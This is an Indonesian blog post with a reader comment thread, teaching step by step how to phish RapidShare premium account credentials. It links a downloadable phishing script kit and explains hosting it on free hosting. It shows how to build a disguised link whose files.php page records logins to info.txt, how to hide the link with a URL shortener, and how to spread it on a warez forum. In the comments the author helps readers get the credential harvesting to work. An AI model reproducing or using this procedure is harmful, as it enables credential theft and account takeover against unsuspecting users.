| 38 comments ]

Seperti yang telah opa janjikan sebelumnya, ketika menjelaskan Tutorial Phising untuk orang awam, maka opa akan menuliskan cara melakukan teknik phising di rapidshare, trick ini membutuhkan ketelitian dalam penerapan nya, jadi sebelum opa mulai penjelasan nya, diharapkan untuk memperhatikan detail setiap step-step nya.

tutorial phising rapidshare ini menggunakan fake link, atau link palsu. dimana pada saat penerapan nya kita buat link asli dari rapidshare tsb, di direct dulu ke sebuah hosting kita untuk merecord password dan usernamenya, yang selanjutnya akan diteruskan ke rapidsharenya.

Jadi, modal pertama dalam melakukan trick ini, kita kudu dan wajib memiliki sebuah web hosting, pemilihan tempat hosting tersebut terserah anda, bisa menggunakan website hosting milik anda sendiri ataupun di website yang menyediakan secara Gratis, seperti Ripway, fileave dan lain-lain.
jika kalian ingin mencoba menggunakan hosting gratis, bisa menggunakan Ripway dan bisa lihat step-step pendaftaran nya di sini, dan saran opa untuk pembelajaran sebaiknya anda menggunakan ripway terlebih dahulu.

Selanjutnya ikuti step-step berikut ini :

Langkah 1
Download dahulu Script Phising Rapidshare nya :
Update:
http://www.ziddu.com/download/3621994/Script-RS_by_blognyaopa.blogspot.com.rar.html
Kemudian extract file tersebut.

Langkah 2
Daftar / Register ke webhosting, Tempatnya terserah anda, sebaiknya gunakan Ripway.com
bagi yang belum punya, bisa liat cara pendaftaran di Ripway disini

Langkah 3
Upload ke enam files yang udah di extact tadi ke Ripway.com yang kamu telah kalian buat. untuk caranya uploadnya bisa baca disini

Langkah 4
Kemudian cari link file rapidshare yang akan di jadikan target sebagai link palsu / fake link.
Sebagai Contoh opa pake link asli dari rapidshare yang ini :

http://rs298.rapidshare.com/files/109788475/Westward_II_Heroes_of_the_Frontier.rar

Kalian bisa menggunakan Link dari rapidshare yang lain yang ingin dijadikan sebagai target. link diatas hanya sebagai contoh.

Langkah 5
buka Kembali ripway.
Login dengan Account kalian, Setelah itu klik My Files.
Perhatikan Pada menu My file tersebut.
terdapat 6 file yang telah kalian upload.
cari yang : files.php

files.phpcopy link dari files.php tersebut ke Notepad
liat gambar diatas, contoh files.php digambar tersebut mempunyai link :

http://h1.ripway.com/rapidsaren/files.php (sesuaikan dengan link kalian)

Nah copy link kalian tersebut ke Notepad

Langkah 6
Kemudian perhatikan link kalian tersebut, tambahkan ?rs=&s= pada Akhir linknya.
Sebagai contoh opa gunakan link dicontoh gambar diatas, maka Hasilnya :
http://h1.ripway.com/rapidsaren/files.php?rs=&s=

utk penjelasan :
rs=link yang dituju
s=ukuran file

Langkah 7
Kemudian masukan link asli dari rapidshare yang akan dijadiin target sebagai link palsu, posisi letaknya setelah rs=
perhatikan langkah 4, opa mengambil contoh ini :

http://rs298.rapidshare.com/files/109788475/Westward_II_Heroes_of_the_Frontier.rar

kemudian paste sesudah rs=
maka hasilnya seperti ini :

http://h1.ripway.com/rapidsaren/files.php?rs=http://rs298.rapidshare.com/files/109788475/Westward_II_Heroes_of_the_Frontier.rar&s=

Tulisan yang berwarna merah adalah link asli dari rapidshare, anda bisa sesuaikan dengan link keinginan anda sendiri yang akan dijadikan target sebagai phising.

Langkah 8
Selanjutnya masukan size / ukuran dari file rapidshare tsb. ukuran nya bisa terserah anda, atau sesuaikan dengan aslinya. posisi letak size filenya adalah setelah s=

Bagaimana cara mengetahui ukuran file asli nya?,apakah harus di download dahulu?
Tidak harus di download dahulu, cukup buka link asli rapidshare nya, selanjutnya lihat di sebelah kanan, posisinya ditengah-tengah.

sizelihat gambar diatas, maka size dari : http://rs298.rapidshare.com/files/109788475/Westward_II_Heroes_of_the_Frontier.rar adalah 39730

Selanjutnya letakan setelah =rs, maka hasilnya :

http://h1.ripway.com/rapidsaren/files.php?rs=http://rs298.rapidshare.com/files/109788475/
Westward_II_Heroes_of_the_Frontier.rar
&s=39730

tulisan warna biru adalah ukuran dari file tsb.
sekarang silahkan test hasil yang telah kalian buat, bukalah ke address bar.

Lihat hasilnya, bagaimana?sukseskan.
tapi, ada sedikit masalah, masa kita share link yang panjang tersebut. nantinya akan dengan mudah ketahuan. bener?
solusinya kita bisa memendekan link tersebut, bagaimana caranya?

Cari situs yang di gunakan untuk memendekkan url.
Contoh situsnya :
http://lix.in

Kemudian Copy dan paste link yang telah kita palsukan tadi

http://h1.ripway.com/rapidsaren/files.php?rs=http://rs298.rapidshare.com/files/109788475/
Westward_II_Heroes_of_the_Frontier.rar
&s=39730

ke http://lix.in
selanjutnya klik protect link.
Maka hasilnya :

http://lix.in/-3a0bba

Done, link yang panjang tadi berubah menjadi pendek.
Selanjutnya kita coba apakah bisa record / menyimpan password nya,

Coba klik link tsb, maka akan menuju keRapidshare, kemudian klik premium user.
sebagai contoh, isi Login dan password terserah anda, walaupun tidak valid, (kan hanya sebagai percobaan) maka hasil dari login dan password akan ke record / kesimpan ke sebuah file di account ripway kita, tepatnya di info.txt

untuk melihatnya kembali ke ripway.
Klik My Files dan buka info.txt, klik pada file info.txt
dan hasilnya account (login dan password) yang telah kita tulis di premium user bakalan ke record ke situ.

Selesai, Nah tugas terakhir adalah share link tersebut ke orang-orang yang kira-kira memiliki Account rapidshare yang valid, untuk mendapatkan Account Valid dari Rapidshare.
Opa biasanya share ke forum orang-orang bule yang khusus berbagi software. biasaya opa sharing di http://www.warezscene.org/

Huffh!Panjang Juga yah...
nah Sekarang anda bisa melakukan Phising Rapidshare. Jika ada Pertanyaan silahkan Tinggalkan Komentar dibawah, akan opa bales Secepatnya.

semoga bermanfaat

38 comments

pasqal mengatakan... @ 22 Februari 2009 00.50

.paaraahh YM na gaq pernah OL lg..hikz'x..hikz'x.....

didin mengatakan... @ 22 Februari 2009 08.21

opa hebat banget euy..

TUKANG ARSIP mengatakan... @ 22 Februari 2009 08.47

wah hebat deh opa

bambang mengatakan... @ 22 Februari 2009 20.39

wah, panjaaaaaaaaang stepnya. Kudu sabar neh belajarnya.

bambang mengatakan... @ 22 Februari 2009 21.11

wew, pada step 5, linknya kok ga nyambung ya? Mumet je

bambang mengatakan... @ 22 Februari 2009 21.20

http://lix.in ga bisa di askes.

bambang mengatakan... @ 22 Februari 2009 21.28

macet pd tahap memendekkan url...tulung tulung

Hangga Nuarta mengatakan... @ 22 Februari 2009 22.27

Wah... mantab Mas... Walaupun panjang, tapi penjelasannya mudah dimengerti.

O ya, pada langkah 6, bagian:
http://h1.rapidsaren/files.php?rs=&s=
Bukannya itu salah ketik mas??? Bukannya seharusnya:
http://h1.ripway.com/rapidsaren/files.php?rs=&s=
Hehehe... Cuma mau ngingetin aja. Maaf kalo saya yang salah. :D

Syamsul Alam mengatakan... @ 23 Februari 2009 00.34

hueehuehuehue..... kejahatan....... wkwkwkkwkwkwk.......

fiuh, tapi tertarik juga buat cobain... wkwkwkkwkwk........

Anonim mengatakan... @ 23 Februari 2009 08.37

Opa, gw da coba nech.. gagal buat ngerecord passwordnya....
yg muncul di file textnya cuma tulisan :
PIN=
PIN=
gimana nech? da solusi gak?

Rgrds,
Elf Huang

ardiheryanto mengatakan... @ 23 Februari 2009 21.12

opah saya masih tidak bisa login di rs
cara loginnya bagaimana?

saya cuma dapat pin doang pas buka ripway.com

Anonim mengatakan... @ 23 Februari 2009 21.20

koq ga isa sih
PIN=
PIN=
PIN=

ada yang salah?

oPa mengatakan... @ 24 Februari 2009 09.56

@bambang
moso gak bisa,
nih opa ja lancar akeses ini :
coba copy ke addres bar :
http://lix.in/

oPa mengatakan... @ 24 Februari 2009 09.58

@hangga
yups...bener nga'
opa salah ketik...
:D

oPa mengatakan... @ 24 Februari 2009 09.59

@Anonim
untuk yang gak kerecord,
coba ulangi dengan teliti, opa da jelasin se jelas-jelas nya,..makanya hasilnya panjang...

Anonim mengatakan... @ 24 Februari 2009 15.03

Sori opa...
mw nanya lagi
dah saya ulang berkali-kali langkah nya tapi tetap ajah ga isa....
ato mungkin Script Phising Rapidshare nya dah ga isa kali yah.....
upload in Script Phising Rapidshare yg biasa opa pake dundz.....^_____^
btw nambah ilmu nih....
gud job Lah oPa....

oPa mengatakan... @ 24 Februari 2009 15.43

@anonim
sudah di update, dan itu asli pakean opa...

Anonim mengatakan... @ 25 Februari 2009 12.38

opa gmna neih,,
fs ku di rusak,,
aku g bsa ngrim testi ke tmn,,
bka friendster home ja sering eror,,

bantu saya opa,,
krim ke ocol_sk8rogue@yahoo.co.id

Anonim mengatakan... @ 28 Februari 2009 14.38

tq op...
saya coba dolo yah....
ntar klo ada kesulitan saya tanya lagi...
jangan bosen yah opa klo saya tanyain molo...
hehehhehehehhee..

Anonim mengatakan... @ 28 Februari 2009 15.14

FYI....
ku dah nyoba oPa..
tapi belum liat hasil na, account dah keburu suspected....hehehehe...
sekarang g nyari webhosting gratis...
kira2 di ziddu bisa ga yah....
tes dolo ah...(^.^_V)

oPa mengatakan... @ 1 Maret 2009 11.21

@anonim
iya silahkan tanya ja...

kl di ziddu gak bisa bro...
cb di 00webhost

Anonim mengatakan... @ 1 Maret 2009 12.37

aduH oPa...saya keder...ahaQ~
buat upload file ke 00webhost bijimana yaa..??
soal na banyak amad option na....
saya dah buat acc di 00webhost..dah active..
tapi ya itu...keder...
mana B.Inggris pas2an...
adooh jadi curhat...ahaQ...

Anonim mengatakan... @ 3 Maret 2009 17.03

makanya pake idm yah kalo mau donlot dari rs jangan direct download

Anonim mengatakan... @ 12 Maret 2009 05.29

gua koq jd bingung sendiri ya ? mampus dah gua ! mending yg udah matang aza boz !!!

Ardhy mengatakan... @ 17 Maret 2009 01.24

gimana neh opa gw dah lakuin sperti yang sdh opa suruh tapi hasilnya muncul tulisan:


Site blocked. h1.ripway.com is not allowed on this network.

This site was categorized as:

Proxy/Anonymizer

Questions? Not properly categorized?



Gmana dunK???????

Ardhy mengatakan... @ 17 Maret 2009 01.31

oh iya opa gua udah upload file "info.txt"tp gak muncul di my files. gmana lagi dunk OPA????

oPa mengatakan... @ 18 Maret 2009 20.16

@ardhy
opa juga pernah gitu awalnya....coba ja di isi di fake loginnya...nanti muncul sendiri..
ok?

Anonim mengatakan... @ 19 Maret 2009 01.00

opa ko pas gw upload info.txt ga masuk ya.....??
jadi cuma 5 file doang yang bisa ke upload...
trus info.txt yg diextracx kosong seh.pa mang gtu..binggung ne.thanks

chonde12

Anonim mengatakan... @ 19 Maret 2009 01.27

oh ya di step 5-7
setelah di copy ke notepad trus ditambah tambah ampe jadi kaya .......http://h1.ripway.com/rapidsaren/files.php?rs=http://rs298.rapidshare.com/files/109788475/
Westward_II_Heroes_of_the_Frontier.rar&s=39730
...notepadnya di upload juga ga....binggung neh

Anonim mengatakan... @ 19 Maret 2009 15.00

opa abiz gw proteck link trus gw buka kuk yg ke buka malah ripway...
n malah ripway gw jadi suspended....?????
jdi binunn...
mohon pencerahanya

deeriee mengatakan... @ 22 Maret 2009 11.10

sip...

David mengatakan... @ 26 Maret 2009 10.04

opa...itu web hostingnya kok suspended ya....sama seperti yg dialamin anonim....btw tdk ada lg wes hosting lainnya opa ? btw sitenya opa bgs bener... saya dah cari ubek2 web hosting kagak ada yg support bgt opa...mhn dikrm ke davidcrozz@yahoo.com ya opa...opa tmbh oke ^^

oPa mengatakan... @ 26 Maret 2009 20.23

iya nih...ripway sekarang lebih ketet dibanding bisanya...
:D
kyknya kudu nyari hosting lain..
:D

ipay76.blog.com mengatakan... @ 29 Maret 2009 19.15

Wah hebat, opa. Nanti bisa2 coba. Sip infonya. Saya suka yang ilegal2 seperti ini. Ha..ha.. saya tunggu postingan hacking yang lain. Ok.. thanks sob.

Anonim mengatakan... @ 15 April 2009 13.13

om minta penerangan dunk...ym panggilnamakuandik@yahoo.com

Rendy BlogHeboh "Blog Dofollow" mengatakan... @ 3 Mei 2009 00.10

wahhh panjang banget tutorialnya..
tapi keren juga nihh..
rame kalo masalah ginian mah..
hahaha...

Silahkan berkunjung ke BLOG HEBOH dan jangan lupa berkomentar karena BLOG HEBOH masih tetap DOFOLLOW >>
Posting Terakhir :Tutorial atau Panduan Ciao | $5 dalam waktu 1 Jam

Anonim mengatakan... @ 17 Juni 2009 02.39

muuuumeeeetttttt

illusion_dhe mengatakan... @ 17 Oktober 2009 06.28

opa script phisingnya dah ga bisa..
update donk opa script phisingnya..

Poskan Komentar

Related Posts Plugin for WordPress, Blogger...